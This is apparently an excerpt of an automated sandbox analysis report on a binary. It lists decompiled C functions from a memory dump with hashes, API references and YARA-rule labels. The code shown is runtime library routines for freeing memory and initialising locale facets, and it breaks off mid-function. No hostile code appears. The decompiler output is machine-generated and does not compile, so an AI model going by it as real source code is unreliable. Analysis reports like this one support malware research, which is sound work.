Instruction Fuzzy Hash: B341E134A00A09AFCF04DFA8C844AEE7BF9AF45328F108565F8155B792D731AD82DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E21D29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E21CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6E21CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6E21CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6E21CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6E21CF81(_t5, 2);
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6E21CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6E21CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6E21CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6E21CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6E21CF81(_t13, 2);
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6E20CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E20CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6E21CF81: _free.LIBCMT ref: 6E21CFAA

_free.LIBCMT ref: 6E21D2E9

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21D2F4
_free.LIBCMT ref: 6E21D2FF
_free.LIBCMT ref: 6E21D353
_free.LIBCMT ref: 6E21D35E
_free.LIBCMT ref: 6E21D369
_free.LIBCMT ref: 6E21D374

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: de23213db884c6b6085ab85b17c8d5dced45a5f536ba1953d34a3735d1927f53
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: 1C115479948B4CABD620A7F0CC47FCBB7EE9F04B04F504D36A39A6E0A1D775B6044651

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEF91, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CEF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t946 - 0x14, 0);
				_t903 =  *0x6e286de4;
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6E1A161C(0x6e286d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6E1C66BA(_t946 - 0x14);
					return E6E1E0075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6E1D0D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t946 - 0x20);
							E6E1E3D74(_t946 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t881, _t903, 0x14);
							E6E1C6653(_t946 - 0x14, 0);
							_t904 =  *0x6e286db4;
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6E1A161C(0x6e286d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6E1C66BA(_t946 - 0x14);
								return E6E1E0075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6E1D0DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t946 - 0x20);
										E6E1E3D74(_t946 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t668, _t882, _t904, 0x14);
										E6E1C6653(_t946 - 0x14, 0);
										_t905 =  *0x6e286dd4;
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6E1A161C(0x6e286b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6E1C66BA(_t946 - 0x14);
											return E6E1E0075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6E1D0E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t946 - 0x20);
													E6E1E3D74(_t946 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t668, _t883, _t905, 0x14);
													E6E1C6653(_t946 - 0x14, 0);
													_t906 =  *0x6e286de8;
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6E1A161C(0x6e286d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6E1C66BA(_t946 - 0x14);
														return E6E1E0075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6E1D0EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t946 - 0x20);
																E6E1E3D74(_t946 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t668, _t884, _t906, 0x14);
																E6E1C6653(_t946 - 0x14, 0);
																_t907 =  *0x6e286db8;
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6E1A161C(0x6e286d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6E1C66BA(_t946 - 0x14);
																	return E6E1E0075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6E1D0F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t946 - 0x20);
																			E6E1E3D74(_t946 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t668, _t885, _t907, 0x14);
																			E6E1C6653(_t946 - 0x14, 0);
																			_t908 =  *0x6e286dec;
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6E1A161C(0x6e286d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6E1C66BA(_t946 - 0x14);
																				return E6E1E0075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6E1D0F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t946 - 0x20);
																						E6E1E3D74(_t946 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t668, _t886, _t908, 0x14);
																						E6E1C6653(_t946 - 0x14, 0);
																						_t909 =  *0x6e286dbc;
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6E1A161C(0x6e286d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6E1C66BA(_t946 - 0x14);
																							return E6E1E0075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6E1D0FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t946 - 0x20);
																									E6E1E3D74(_t946 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t668, _t887, _t909, 0x14);
																									E6E1C6653(_t946 - 0x14, 0);
																									_t910 =  *0x6e286df0;
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6E1A161C(0x6e286d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6E1C66BA(_t946 - 0x14);
																										return E6E1E0075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6E1D1057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t946 - 0x20);
																												E6E1E3D74(_t946 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t668, _t888, _t910, 0x14);
																												E6E1C6653(_t946 - 0x14, 0);
																												_t911 =  *0x6e286dc0;
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6E1A161C(0x6e286d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6E1C66BA(_t946 - 0x14);
																													return E6E1E0075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6E1D10BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t946 - 0x20);
																															E6E1E3D74(_t946 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t668, _t889, _t911, 0x14);
																															E6E1C6653(_t946 - 0x14, 0);
																															_t912 =  *0x6e286df8;
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6E1A161C(0x6e286da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6E1C66BA(_t946 - 0x14);
																																return E6E1E0075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6E1D1127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t946 - 0x20);
																																		E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t668, _t890, _t912, 0x14);
																																		E6E1C6653(_t946 - 0x14, 0);
																																		_t913 =  *0x6e286df4;
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6E1A161C(0x6e286da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6E1C66BA(_t946 - 0x14);
																																			return E6E1E0075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6E1D11AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t946 - 0x20);
																																					E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t668, _t891, _t913, 0x14);
																																					E6E1C6653(_t946 - 0x14, 0);
																																					_t914 =  *0x6e286dc8;
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6E1A161C(0x6e286d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6E1C66BA(_t946 - 0x14);
																																						return E6E1E0075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6E1D1230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t946 - 0x20);
																																								E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t668, _t892, _t914, 0x14);
																																								E6E1C6653(_t946 - 0x14, 0);
																																								_t915 =  *0x6e286dc4;
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6E1A161C(0x6e286d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6E1C66BA(_t946 - 0x14);
																																									return E6E1E0075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6E1D12B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t946 - 0x20);
																																											E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t668, _t893, _t915, 0x14);
																																											E6E1C6653(_t946 - 0x14, 0);
																																											_t916 =  *0x6e286dd8;
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6E1A161C(0x6e286d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6E1C66BA(_t946 - 0x14);
																																												return E6E1E0075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6E1D1339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t946 - 0x20);
																																														E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t668, _t894, _t916, 0x14);
																																														E6E1C6653(_t946 - 0x14, 0);
																																														_t917 =  *0x6e286db0;
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6E1A161C(0x6e286d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6E1C66BA(_t946 - 0x14);
																																															return E6E1E0075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6E1D13A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t946 - 0x20);
																																																	E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t668, _t895, _t917, 0x14);
																																																	E6E1C6653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6e286ddc;
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6E1A161C(0x6e286d88);
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t946 - 0x14);
																																																		return E6E1E0075(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(_t918 == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6E1D1409(_t668, _t776, _t879, _t896, _t918) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t946 - 0x20);
																																																				E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t668, _t896, _t918, 0x14);
																																																				E6E1C6653(_t946 - 0x14, 0);
																																																				_t919 =  *0x6e286de0;
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6E1A161C(0x6e286d8c);
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t946 - 0x14);
																																																					return E6E1E0075(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(_t919 == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6E1D1471(_t668, _t783, _t879, _t897, _t919) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t946 - 0x20);
																																																							E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t668, _t897, _t919, 0x14);
																																																							E6E1C6653(_t946 - 0x14, 0);
																																																							_t920 =  *0x6e286dfc;
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6E1A161C(0x6e286da8);
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t946 - 0x14);
																																																								return E6E1E0075(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(_t920 == 0) {
																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6E1D14EC(_t668, _t790, _t879, _t898, _t920) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t946 - 0x20);
																																																										E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t668, _t898, _t920, 0x14);
																																																										E6E1C6653(_t946 - 0x14, 0);
																																																										_t921 =  *0x6e286dcc;
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6E1A161C(0x6e286d80);
																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t946 - 0x14);
																																																											return E6E1E0075(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(_t921 == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6E1D1558(_t668, _t797, _t879, _t899, _t921) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1A1438(_t946 - 0x20);
																																																													E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e2283cf, _t668, _t899, _t921, 0x14);
																																																													E6E1C6653(_t946 - 0x14, 0);
																																																													_t922 =  *0x6e286e00;
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6E1A161C(0x6e286dac);
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6E1C66BA(_t946 - 0x14);
																																																														return E6E1E0075(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(_t922 == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6E1D15C4(_t668, _t804, _t879, _t900, _t922) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E1A1438(_t946 - 0x20);
																																																																E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																																																asm("int3");
																																																																E6E1E00AC(0x6e2283cf, _t668, _t900, _t922, 0x14);
																																																																E6E1C6653(_t946 - 0x14, 0);
																																																																_t923 =  *0x6e286dd0;
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6E1A161C(0x6e286d60);
																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6E1A171B( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6E1C66BA(_t946 - 0x14);
																																																																	return E6E1E0075(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(_t923 == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6E1D162A(_t668, _t811, _t879, _t901, _t923) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6E1A1438(_t815);
																																																																			E6E1E3D74(_t946 - 0x20, 0x6e283504);
																																																																			asm("int3");
																																																																			E6E1E00AC(0x6e22851f, _t668, _t901, _t923, 4);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6e22c0c4;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6E1D542F(_t668, _t815, _t879, _t901, _t924,  *_t301);
																																																																			return E6E1E0075(_t924,  *((intOrPtr*)(_t946 + 8)));
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6E1C6FD3(__eflags, _t901);
																																																																			 *0x6e22a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6e286dd0 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6E1C6FD3(__eflags, _t900);
																																																																 *0x6e22a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6e286e00 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
																																																													 *(_t946 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t899);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6e286dcc = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t898);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6e286dfc = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t897);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6e286de0 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t896);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6e286ddc = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t895);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6e286db0 = _t895;
